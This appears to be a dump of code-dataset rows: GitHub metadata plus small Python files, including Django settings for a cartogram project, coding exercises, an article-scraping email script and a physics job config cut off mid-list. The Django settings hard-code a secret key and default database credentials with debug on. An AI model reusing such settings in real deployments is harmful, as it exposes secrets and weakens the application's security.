blob_id stringlengths 40-40 | directory_id stringlengths 40-40 | path stringlengths 3-616 | content_id stringlengths 40-40 | detected_licenses listlengths 0-112 | license_type stringclasses 2 values | repo_name stringlengths 5-115 | snapshot_id stringlengths 40-40 | revision_id stringlengths 40-40 | branch_name stringclasses 777 values | visit_date timestamp[us] 2015-08-06 10:31:46 to 2023-09-06 10:44:38 | revision_date timestamp[us] 1970-01-01 02:38:32 to 2037-05-03 13:00:00 | committer_date timestamp[us] 1970-01-01 02:38:32 to 2023-09-06 01:08:06 | github_id int64 4.92k-681M ⌀ | star_events_count int64 0-209k | fork_events_count int64 0-110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us] 2012-06-04 01:52:49 to 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us] 2008-05-22 07:58:19 to 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3-10.2M | extension stringclasses 188 values | content stringlengths 3-10.2M | authors listlengths 1-1 | author_id stringlengths 1-132
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f30face88618b2e53b4b5aed2c70c8cffcfda98a | e2b2d81d1ea5beeb79d498dd4962fb5ed40e4678 | /settings.py | 322bb0ae98666366fece731a9d367f8abb04e868 | [] | no_license | palewire/dorling-cartogram-example | ddd70d3c310d323f3c896a473d032ccf67da182c | 4892546b9a97aa6de0c1f3f0fe6e130319ce8378 | refs/heads/master | 2021-01-19T20:16:26.152106 | 2011-10-04T04:26:30 | 2011-10-04T04:26:30 | 2,502,718 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,923 | py | # Django settings for project project.
import os
ROOT_PATH = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
    # ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'dorling',                                  # Or path to database file if using sqlite3.
        'USER': 'postgres',                                 # Not used with sqlite3.
        'PASSWORD': 'postgres',                             # Not used with sqlite3.
        'HOST': 'localhost',                                # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '5432',                                     # Set to empty string for default. Not used with sqlite3.
    }
}
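# Illustrative sketch, not part of the original settings: the hard-coded
# credentials above could instead be overridden from the environment
# (the variable names DORLING_DB_USER / DORLING_DB_PASSWORD are hypothetical).
DATABASES['default']['USER'] = os.environ.get('DORLING_DB_USER', DATABASES['default']['USER'])
DATABASES['default']['PASSWORD'] = os.environ.get('DORLING_DB_PASSWORD', DATABASES['default']['PASSWORD'])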
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Los_Angeles'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = 'http://palewire.s3.amazonaws.com/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '5um6b5gjouo_#2ymj1+_&y&pfm6aje8+mpg5%#=z&=1q31awgl'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'project.urls'
TEMPLATE_DIRS = (
    os.path.join(ROOT_PATH, 'templates'),
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.admin',
    'django.contrib.gis',
    'us_states',
    'dorling',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
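# Note (added for illustration): Django applies this dict with dictConfig at
# startup, so an ERROR logged on the 'django.request' logger is emailed to
# ADMINS through the mail_admins handler above.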
| [
"[email protected]"
] | |
3f2965e0c1071535736a0f8cee0a336628ca67e0 | 1385cf00f550ad38378227f62c49bb0cd05e1b04 | /leecode/easy/207/1365.py | 18f68a18946e06d936942586dac1d72c48b110fa | [] | no_license | liucheng2912/py | 4a09652fa52a1f92e8d8dd1239f9c128248fc10e | d40f73450fa65b8dd4d59d8d92088382fc573d2a | refs/heads/master | 2023-03-15T21:07:03.456017 | 2021-03-11T09:15:30 | 2021-03-11T09:15:30 | 334,900,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 275 | py | '''
Approach:
double traversal (nested loops)
'''
def f(nums):
    a = []                  # a[i] = count of numbers smaller than nums[i]
    for x in nums:
        temp = 0
        nums1 = nums[:]     # work on a copy so nums is left untouched
        nums1.remove(x)     # drop one occurrence of x itself
        for y in nums1:
            if x > y:
                temp += 1
        a.append(temp)
    return a
nums = [6,5,4,8]
print(f(nums))
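# A minimal alternative sketch (added for illustration, not part of the original
# solution): the same counts in O(n log n), since the first index of a value in
# the sorted list equals how many elements are smaller than it.
def f_sorted(nums):
    order = sorted(nums)
    first_index = {}
    for i, x in enumerate(order):
        first_index.setdefault(x, i)   # remember only the first position of each value
    return [first_index[x] for x in nums]

print(f_sorted(nums))  # same output as f(nums)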
| [
"[email protected]"
] | |
2bb29f3a8f5b1b7fbebbe190a039627e34f71d57 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_325/ch30_2019_08_26_19_33_38_456658.py | 856f9fb13cced922caa07303d99b2963d8c3cf61 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | import math
def jaca(v, o):
    # projectile range: d = v**2 * sin(2*o) / g, with g = 9.8 m/s^2
    # (assumption: the angle o is given in degrees, hence the conversion)
    d = (v**2.0) * math.sin(math.radians(2.0*o)) / 9.8
    if d < 98.0:
        return ("Muito perto")      # "Too close"
    elif d >= 98.0 and d <= 102.0:
        return ("Acertou!")         # "Hit it!"
    else:
        return ("Muito longe")      # "Too far"
print(jaca(5.0, 45.0)) | [
"[email protected]"
] | |
bd3c614d453ba44555d79e289a0d4d923e611a74 | 9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612 | /exercises/1901050013/d11/main.py | 62fffbca9611008650d6ac289947ccf42f4a8d45 | [] | no_license | shen-huang/selfteaching-python-camp | e8410bfc06eca24ee2866c5d890fd063e9d4be89 | 459f90c9f09bd3a3df9e776fc64dfd64ac65f976 | refs/heads/master | 2022-05-02T05:39:08.932008 | 2022-03-17T07:56:30 | 2022-03-17T07:56:30 | 201,287,222 | 9 | 6 | null | 2019-08-08T15:34:26 | 2019-08-08T15:34:25 | null | UTF-8 | Python | false | false | 718 | py | import yagmail
import requests
import getpass
from pyquery import PyQuery
from mymodule.stats_word import stats_text_cn
response = requests.get('https://mp.weixin.qq.com/s/pLmuGoc4bZrMNl7MSoWgiA') # fetch the article page.
document = PyQuery(response.text)
content = document('#js_content').text() # extract the article body text.
result = str(stats_text_cn(content)) # convert the stats result into a string.
sender = input('please input your email address:')
password = getpass.getpass('please input your password:')
recipients = input('please input the recipients:')
subject = input('please input the subject:')
yag = yagmail.SMTP(sender,password,'smtp.qq.com')
yag.send(to=recipients,subject=subject,contents=result) | [
"[email protected]"
] | |
2db42dee1688750e9f9b5361e4af2c9f36d228c3 | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/june_2021/walmart/10_triplet_sum_to_zero.py | e4e1d155945f4f6d79319f6ba48f01df9e967c5b | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | def triplet_sum_to_zero(nums, target):
    def find_target_pair_sum(t, left):
        # two-pointer scan for pairs summing to t; nums[first] is the fixed element
        first = left - 1
        right = len(nums)-1
        while left < right:
            if nums[left] + nums[right] == t:
                res.append((nums[first], nums[left], nums[right]))
                left += 1
                right -= 1
                # skip duplicates so the same triplet is not reported twice
                while left < right and nums[left] == nums[left-1]:
                    left += 1
                while left < right and nums[right] == nums[right+1]:
                    right -= 1
            elif nums[left] + nums[right] > t:
                right -= 1
            else:
                left += 1

    nums.sort()
    res = []
    for i in range(len(nums)-1):
        # skip duplicate first elements
        if i == 0 or nums[i] != nums[i-1]:
            find_target_pair_sum(target-nums[i], i+1)
    return res
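# Illustrative usage (the input values below are assumptions, not from the file):
print(triplet_sum_to_zero([-3, 0, 1, 2, -1, 1, -2], 0))
# -> [(-3, 1, 2), (-2, 0, 2), (-2, 1, 1), (-1, 0, 1)]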
| [
"[email protected]"
] | |
5e5c4e2de7fe0b92d59fe49e8ed41262a8b5854a | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/22Jul/down/emb/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0_1374500587/HTT_22Jul_manzoni_Down_Jobs/Job_104/run_cfg.py | af465597ac04797342d557667927aeff1a2019b3 | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69,041 | py | import FWCore.ParameterSet.Config as cms
import os,sys
sys.path.append('/afs/cern.ch/user/m/manzoni/summer13/CMGTools/CMSSW_5_3_9/src/CMGTools/H2TauTau/prod/22Jul/down/emb/DoubleMuParked/StoreResults-Run2012B_22Jan2013_v1_PFembedded_trans1_tau132_pthad1_30had2_30_v1-5ef1c0fd428eb740081f19333520fdc8/USER/V5_B/PAT_CMG_V5_16_0_1374500587/HTT_22Jul_manzoni_Down_Jobs')
from base_cfg import *
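# Per-job override: everything else comes from base_cfg (imported above); only
# process.source is redefined here, restricting input to the run:lumi ranges
# listed in lumisToProcess below.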
process.source = cms.Source("PoolSource",
noEventSort = cms.untracked.bool(True),
inputCommands = cms.untracked.vstring('keep *',
'drop cmgStructuredPFJets_cmgStructuredPFJetSel__PAT'),
lumisToProcess = cms.untracked.VLuminosityBlockRange( ("190645:10-190645:110", "190646:1-190646:111", "190659:33-190659:167", "190679:1-190679:55", "190688:69-190688:249",
"190702:51-190702:53", "190702:55-190702:122", "190702:124-190702:169", "190703:1-190703:252", "190704:1-190704:3",
"190705:1-190705:5", "190705:7-190705:65", "190705:81-190705:336", "190705:338-190705:350", "190705:353-190705:383",
"190706:1-190706:126", "190707:1-190707:237", "190707:239-190707:257", "190708:1-190708:189", "190733:71-190733:96",
"190733:99-190733:389", "190733:392-190733:460", "190736:1-190736:80", "190736:83-190736:185", "190738:1-190738:130",
"190738:133-190738:226", "190738:229-190738:349", "190782:55-190782:181", "190782:184-190782:233", "190782:236-190782:399",
"190782:401-190782:409", "190895:64-190895:202", "190895:210-190895:302", "190895:305-190895:584", "190895:587-190895:948",
"190906:73-190906:256", "190906:259-190906:354", "190906:356-190906:496", "190945:124-190945:207", "190949:1-190949:81",
"191043:45-191043:46", "191046:1-191046:21", "191046:24-191046:82", "191046:84-191046:88", "191046:92-191046:116",
"191046:119-191046:180", "191046:183", "191046:185-191046:239", "191056:1", "191056:4-191056:9",
"191056:16-191056:17", "191056:19", "191057:1", "191057:4-191057:40", "191062:1",
"191062:3", "191062:5-191062:214", "191062:216-191062:541", "191090:1-191090:55", "191201:38-191201:49",
"191201:52-191201:79", "191202:1-191202:64", "191202:66-191202:68", "191202:87-191202:105", "191202:108-191202:118",
"191226:77-191226:78", "191226:81-191226:831", "191226:833-191226:1454", "191226:1456-191226:1466", "191226:1469-191226:1507",
"191226:1510-191226:1686", "191247:1-191247:153", "191247:156-191247:280", "191247:283-191247:606", "191247:608-191247:620",
"191247:622-191247:818", "191247:821-191247:834", "191247:837-191247:1031", "191247:1034-191247:1046", "191247:1049-191247:1140",
"191247:1143-191247:1187", "191247:1190-191247:1214", "191247:1217-191247:1224", "191248:1-191248:103", "191264:59-191264:79",
"191264:82-191264:152", "191264:155-191264:189", "191271:56-191271:223", "191271:225-191271:363", "191276:1-191276:16",
"191277:1-191277:28", "191277:30-191277:164", "191277:167-191277:253", "191277:255-191277:457", "191277:460-191277:535",
"191277:537-191277:576", "191277:579-191277:775", "191277:778-191277:811", "191277:813-191277:849", "191367:1-191367:2",
"191411:1-191411:23", "191695:1", "191718:43-191718:95", "191718:98-191718:207", "191720:1",
"191720:3-191720:15", "191720:17-191720:181", "191721:1", "191721:3-191721:34", "191721:36-191721:183",
"191721:186-191721:189", "191726:1-191726:13", "191810:15", "191810:22-191810:49", "191810:52-191810:92",
"191830:54-191830:242", "191830:245-191830:301", "191830:304-191830:393", "191833:1", "191833:3-191833:103",
"191834:1-191834:30", "191834:33-191834:74", "191834:77-191834:299", "191834:302-191834:352", "191837:1-191837:44",
"191837:47-191837:53", "191837:56-191837:65", "191856:1-191856:133", "191859:1-191859:28", "191859:31-191859:126",
"193093:1-193093:33", "193123:1-193123:27", "193124:1-193124:52", "193192:58-193192:86", "193193:1-193193:6",
"193193:8", "193193:11-193193:83", "193193:86-193193:120", "193193:122-193193:160", "193193:162-193193:274",
"193193:276-193193:495", "193193:497-193193:506", "193207:54-193207:182", "193334:29-193334:172", "193336:1-193336:264",
"193336:267-193336:492", "193336:495-193336:684", "193336:687-193336:729", "193336:732-193336:951", "193541:77-193541:101",
"193541:103-193541:413", "193541:416-193541:575", "193541:578-193541:619", "193556:41-193556:83", "193557:1-193557:84",
"193575:48-193575:173", "193575:176-193575:349", "193575:351-193575:394", "193575:397-193575:415", "193575:417-193575:658",
"193575:660-193575:752", "193621:60-193621:570", "193621:573-193621:769", "193621:772-193621:976", "193621:979-193621:1053",
"193621:1056-193621:1137", "193621:1139-193621:1193", "193621:1195-193621:1371", "193621:1373-193621:1654", "193834:1-193834:35",
"193835:1-193835:20", "193835:22-193835:26", "193836:1-193836:2", "193998:66-193998:113", "193998:115-193998:278",
"193999:1-193999:45", "194027:57-194027:113", "194050:53-194050:113", "194050:116-194050:273", "194050:275-194050:355",
"194050:357-194050:369", "194050:372-194050:391", "194050:394-194050:490", "194050:492-194050:814", "194050:816-194050:1435",
"194050:1437-194050:1735", "194050:1760-194050:1888", "194051:1-194051:12", "194052:1-194052:99", "194052:102-194052:166",
"194075:48-194075:101", "194075:103", "194075:105-194075:107", "194075:109", "194075:111",
"194076:1-194076:9", "194076:11-194076:55", "194076:58-194076:163", "194076:165-194076:228", "194076:230-194076:264",
"194076:267-194076:507", "194076:509-194076:527", "194076:530-194076:538", "194076:541-194076:562", "194076:565-194076:748",
"194108:81-194108:161", "194108:164-194108:264", "194108:266-194108:373", "194108:376-194108:396", "194108:398-194108:433",
"194108:436-194108:452", "194108:454-194108:577", "194108:579-194108:590", "194108:593-194108:668", "194108:671-194108:872",
"194115:66-194115:184", "194115:186-194115:338", "194115:340-194115:346", "194115:348-194115:493", "194115:496-194115:731",
"194115:819-194115:857", "194117:1-194117:38", "194119:1-194119:229", "194119:232-194119:261", "194120:1-194120:162",
"194120:165-194120:406", "194150:42-194150:127", "194150:129-194150:261", "194150:264-194150:311", "194151:47-194151:72",
"194151:75-194151:191", "194151:193-194151:238", "194151:240-194151:617", "194151:619", "194151:621",
"194151:623", "194153:1-194153:115", "194199:96-194199:227", "194199:229-194199:336", "194199:339-194199:402",
"194210:3-194210:195", "194210:198-194210:217", "194210:220-194210:359", "194210:361-194210:555", "194223:61-194223:112",
"194224:1-194224:126", "194224:129-194224:206", "194224:208-194224:250", "194224:253-194224:309", "194224:312-194224:386",
"194224:389-194224:412", "194225:1-194225:23", "194225:26-194225:47", "194225:49-194225:85", "194225:88-194225:149",
"194270:56-194270:68", "194303:56-194303:66", "194303:69-194303:102", "194304:1-194304:43", "194304:46",
"194305:1-194305:84", "194314:52-194314:130", "194314:133-194314:300", "194315:1-194315:10", "194315:13-194315:314",
"194315:317-194315:428", "194315:431-194315:452", "194315:455-194315:467", "194317:1-194317:20", "194424:63-194424:141",
"194424:144-194424:195", "194424:198-194424:266", "194424:268-194424:421", "194424:424-194424:478", "194424:481-194424:531",
"194424:534-194424:553", "194424:556-194424:706", "194424:708", "194428:1-194428:85", "194428:87-194428:122",
"194428:125-194428:294", "194428:296-194428:465", "194429:1-194429:4", "194429:7-194429:54", "194429:57-194429:147",
"194429:150-194429:411", "194429:413-194429:742", "194429:745-194429:986", "194429:988-194429:1019", "194439:46-194439:77",
"194439:79-194439:106", "194455:45-194455:64", "194455:67-194455:140", "194455:142-194455:255", "194455:293-194455:303",
"194464:1-194464:127", "194464:130-194464:142", "194464:145-194464:210", "194479:1-194479:44", "194479:165-194479:232",
"194479:235-194479:262", "194479:265-194479:374", "194479:377-194479:431", "194479:434-194479:489", "194479:492-194479:529",
"194479:531-194479:566", "194480:1-194480:32", "194480:34-194480:205", "194480:207-194480:375", "194480:377-194480:387",
"194480:389-194480:759", "194480:762-194480:956", "194480:959-194480:1402", "194533:46-194533:379", "194533:382-194533:415",
"194533:417-194533:618", "194533:620-194533:872", "194619:31-194619:110", "194631:1-194631:42", "194631:44-194631:100",
"194631:102-194631:169", "194631:171-194631:222", "194643:1-194643:287", "194644:1-194644:168", "194644:171-194644:181",
"194644:184-194644:185", "194644:187-194644:319", "194644:321-194644:421", "194691:61-194691:104", "194691:107-194691:155",
"194691:158-194691:251", "194691:254-194691:268", "194691:271-194691:272", "194691:275-194691:289", "194691:292-194691:313",
"194699:1-194699:30", "194699:32-194699:52", "194699:55-194699:64", "194699:67-194699:71", "194699:73-194699:154",
"194699:157-194699:215", "194699:218-194699:238", "194699:241-194699:259", "194702:1-194702:138", "194702:141-194702:191",
"194704:1-194704:41", "194704:44-194704:545", "194704:548-194704:592", "194711:1-194711:7", "194711:9-194711:619",
"194712:1-194712:56", "194712:61-194712:418", "194712:420-194712:625", "194712:627-194712:759", "194735:44-194735:71",
"194735:74-194735:101", "194735:104-194735:130", "194778:60-194778:118", "194778:120-194778:219", "194789:1-194789:18",
"194789:21-194789:32", "194789:34-194789:80", "194789:82-194789:166", "194789:168-194789:269", "194789:272-194789:405",
"194789:409-194789:414", "194789:417-194789:427", "194789:430-194789:566", "194790:1-194790:45", "194825:72-194825:117",
"194825:120-194825:221", "194896:34-194896:55", "194896:58-194896:79", "194896:82-194896:103", "194897:1-194897:6",
"194897:8-194897:78", "194897:80-194897:96", "194897:98-194897:102", "194912:53-194912:70", "194912:72-194912:96",
"194912:98-194912:444", "194912:446-194912:450", "194912:453-194912:467", "194912:470-194912:561", "194912:564-194912:660",
"194912:663-194912:813", "194912:815-194912:840", "194912:843-194912:864", "194912:866-194912:1004", "194912:1007-194912:1025",
"194912:1027-194912:1067", "194912:1069-194912:1137", "194912:1140-194912:1166", "194912:1168-194912:1249", "194912:1251-194912:1304",
"194912:1307-194912:1444", "194912:1447-194912:1487", "194912:1489-194912:1503", "194912:1506-194912:1662", "194914:1-194914:38",
"194915:1-194915:74", "195013:94-195013:144", "195013:146-195013:185", "195013:187-195013:206", "195013:208-195013:299",
"195013:302-195013:324", "195013:326-195013:366", "195013:369-195013:447", "195013:450-195013:526", "195013:528-195013:541",
"195014:1-195014:6", "195014:9-195014:119", "195014:121-195014:148", "195015:1-195015:13", "195016:1-195016:21",
"195016:23-195016:55", "195016:58-195016:63", "195016:65-195016:174", "195016:177-195016:184", "195016:186-195016:241",
"195016:243-195016:246", "195016:248-195016:251", "195016:254-195016:367", "195016:370-195016:422", "195016:425-195016:560",
"195016:563-195016:569", "195099:70-195099:144", "195099:147-195099:186", "195099:189-195099:208", "195099:211-195099:224",
"195099:227-195099:248", "195109:98-195109:241", "195112:1-195112:12", "195112:15-195112:26", "195113:1-195113:209",
"195113:212-195113:388", "195113:391-195113:403", "195113:406-195113:419", "195113:422-195113:492", "195113:495-195113:579",
"195114:1-195114:69", "195114:72-195114:103", "195115:1-195115:7", "195115:10-195115:22", "195147:132-195147:282",
"195147:285-195147:294", "195147:297-195147:331", "195147:334-195147:363", "195147:366-195147:442", "195147:445-195147:536",
"195147:539-195147:559", "195163:72-195163:138", "195163:140-195163:224", "195163:227-195163:240", "195163:243",
"195163:246-195163:347", "195164:1-195164:64", "195165:1-195165:4", "195165:7-195165:41", "195165:44-195165:54",
"195165:56-195165:153", "195165:156-195165:260", "195165:263-195165:266", "195251:1-195251:131", "195251:134-195251:137",
"195251:140-195251:152", "195251:154-195251:165", "195251:167-195251:242", "195303:109-195303:191", "195303:194-195303:277",
"195303:280-195303:310", "195303:312-195303:316", "195303:318-195303:409", "195304:1-195304:3", "195304:6-195304:22",
"195304:27-195304:80", "195304:83-195304:100", "195304:103-195304:154", "195304:157-195304:341", "195304:344-195304:588",
"195304:590-195304:727", "195304:729-195304:1003", "195304:1006-195304:1079", "195304:1083-195304:1140", "195304:1143-195304:1229",
"195378:90-195378:117", "195378:120-195378:127", "195378:130-195378:185", "195378:187-195378:204", "195378:206-195378:302",
"195378:305-195378:542", "195378:544-195378:565", "195378:567-195378:645", "195378:647-195378:701", "195378:703-195378:734",
"195378:737-195378:1120", "195378:1122-195378:1133", "195390:1", "195390:4-195390:27", "195390:30-195390:145",
"195390:147-195390:183", "195390:186-195390:187", "195390:190-195390:208", "195390:210-195390:213", "195390:215-195390:400",
"195396:49-195396:55", "195396:58-195396:63", "195396:66-195396:131", "195397:1-195397:10", "195397:12-195397:89",
"195397:92-195397:120", "195397:123-195397:141", "195397:143-195397:251", "195397:253", "195397:256-195397:475",
"195397:478-195397:525", "195397:527-195397:608", "195397:611-195397:776", "195397:779-195397:970", "195397:972-195397:1121",
"195397:1123-195397:1181", "195397:1184-195397:1198", "195397:1200-195397:1209", "195398:3-195398:137", "195398:139-195398:494",
"195398:497-195398:585", "195398:587-195398:817", "195398:820-195398:824", "195398:827-195398:1225", "195398:1228-195398:1307",
"195398:1309-195398:1712", "195398:1721-195398:1736", "195398:1741-195398:1752", "195398:1767-195398:1795", "195399:1-195399:192",
"195399:194-195399:382", "195530:1-195530:80", "195530:82-195530:104", "195530:107-195530:156", "195530:159-195530:300",
"195530:302-195530:405", "195540:68-195540:123", "195540:126-195540:137", "195540:140-195540:283", "195540:286-195540:319",
"195551:91-195551:106", "195552:1-195552:21", "195552:23-195552:27", "195552:30-195552:147", "195552:149-195552:155",
"195552:158-195552:182", "195552:185-195552:287", "195552:290-195552:349", "195552:352-195552:469", "195552:472-195552:815",
"195552:818-195552:823", "195552:825-195552:883", "195552:885-195552:1152", "195552:1154-195552:1300", "195552:1303-195552:1789",
"195633:40-195633:42", "195647:1-195647:41", "195649:1-195649:69", "195649:72-195649:151", "195649:154-195649:181",
"195649:183-195649:247", "195655:1-195655:129", "195655:131-195655:184", "195655:186-195655:260", "195655:263-195655:350",
"195655:353-195655:446", "195655:448-195655:483", "195655:485-195655:498", "195656:1-195656:362", "195658:1-195658:37",
"195658:40-195658:362", "195658:364-195658:382", "195658:384-195658:386", "195749:1-195749:8", "195749:10-195749:33",
"195749:36-195749:131", "195757:1-195757:82", "195757:85-195757:115", "195757:118-195757:161", "195757:163-195757:206",
"195758:1-195758:18", "195774:1-195774:13", "195774:16-195774:137", "195774:139-195774:151", "195774:154-195774:162",
"195774:164-195774:256", "195774:258-195774:276", "195774:279-195774:362", "195774:365-195774:466", "195774:469-195774:618",
"195774:620-195774:649", "195774:651-195774:830", "195775:1-195775:57", "195775:60-195775:100", "195775:103-195775:170",
"195776:1-195776:63", "195776:66-195776:283", "195776:286-195776:337", "195776:340-195776:399", "195776:401-195776:409",
"195776:411-195776:477", "195841:74-195841:85", "195868:1-195868:88", "195868:90-195868:107", "195868:110-195868:205",
"195915:1-195915:109", "195915:111-195915:275", "195915:278-195915:390", "195915:393-195915:417", "195915:419-195915:429",
"195915:432-195915:505", "195915:507-195915:747", "195915:749-195915:785", "195915:787-195915:828", "195915:830-195915:850",
"195916:1-195916:16", "195916:19-195916:68", "195916:71-195916:212", "195917:1-195917:4", "195918:1-195918:44",
"195918:46", "195918:49-195918:64", "195919:1-195919:15", "195923:1-195923:14", "195925:1-195925:12",
"195926:1", "195926:3-195926:19", "195926:21-195926:34", "195929:1-195929:29", "195930:1-195930:77",
"195930:80-195930:176", "195930:179-195930:526", "195930:529-195930:596", "195937:1-195937:28", "195937:31-195937:186",
"195937:188-195937:396", "195947:23-195947:62", "195947:64-195947:88", "195948:51-195948:116", "195948:119-195948:144",
"195948:147", "195948:150-195948:352", "195948:355-195948:369", "195948:372-195948:402", "195948:404-195948:500",
"195948:503-195948:540", "195948:543-195948:565", "195948:567-195948:602", "195948:605-195948:615", "195950:1-195950:71",
"195950:73-195950:138", "195950:141-195950:169", "195950:172-195950:332", "195950:335-195950:350", "195950:353-195950:382",
"195950:385-195950:421", "195950:424-195950:450", "195950:453-195950:483", "195950:485-195950:616", "195950:619-195950:715",
"195950:718-195950:787", "195950:789-195950:800", "195950:803-195950:829", "195950:831", "195950:833-195950:1587",
"195963:54-195963:58", "195970:44-195970:49", "195970:51-195970:85", "196019:54-196019:68", "196027:1-196027:55",
"196027:58-196027:119", "196027:121-196027:155", "196027:158-196027:186", "196046:12-196046:40", "196047:1-196047:64",
"196047:70-196047:75", "196048:1-196048:44", "196048:46-196048:48", "196197:58-196197:122", "196197:125-196197:179",
"196197:181-196197:311", "196197:313-196197:516", "196197:519-196197:562", "196199:1-196199:33", "196199:36-196199:83",
"196199:86-196199:118", "196199:121-196199:147", "196199:150-196199:237", "196199:239-196199:285", "196199:287-196199:534",
"196200:1-196200:68", "196202:3-196202:61", "196202:64-196202:108", "196203:1-196203:102", "196203:107-196203:117",
"196218:55-196218:199", "196218:201-196218:224", "196218:226-196218:393", "196218:396-196218:494", "196218:496-196218:741",
"196218:744-196218:752", "196218:754-196218:757", "196218:759-196218:820", "196239:1-196239:59", "196239:62-196239:154",
"196239:157-196239:272", "196239:274-196239:373", "196239:375-196239:432", "196239:435-196239:465", "196239:468-196239:647",
"196239:650-196239:706", "196239:709-196239:1025", "196249:63-196249:77", "196249:80-196249:99", "196250:1-196250:2",
"196250:5-196250:265", "196250:267-196250:426", "196252:1-196252:35", "196334:59-196334:111", "196334:113-196334:123",
"196334:126-196334:132", "196334:135-196334:167", "196334:170-196334:193", "196334:196-196334:257", "196334:259-196334:267",
"196334:270-196334:289", "196334:292-196334:342", "196349:65-196349:84", "196349:86-196349:154", "196349:157-196349:244",
"196349:246-196349:258", "196357:1-196357:4", "196359:1-196359:2", "196362:1-196362:88", "196363:1-196363:8",
"196363:11-196363:34", "196364:1-196364:93", "196364:96-196364:136", "196364:139-196364:365", "196364:368-196364:380",
"196364:382-196364:601", "196364:603-196364:795", "196364:798-196364:884", "196364:887-196364:1196", "196364:1199-196364:1200",
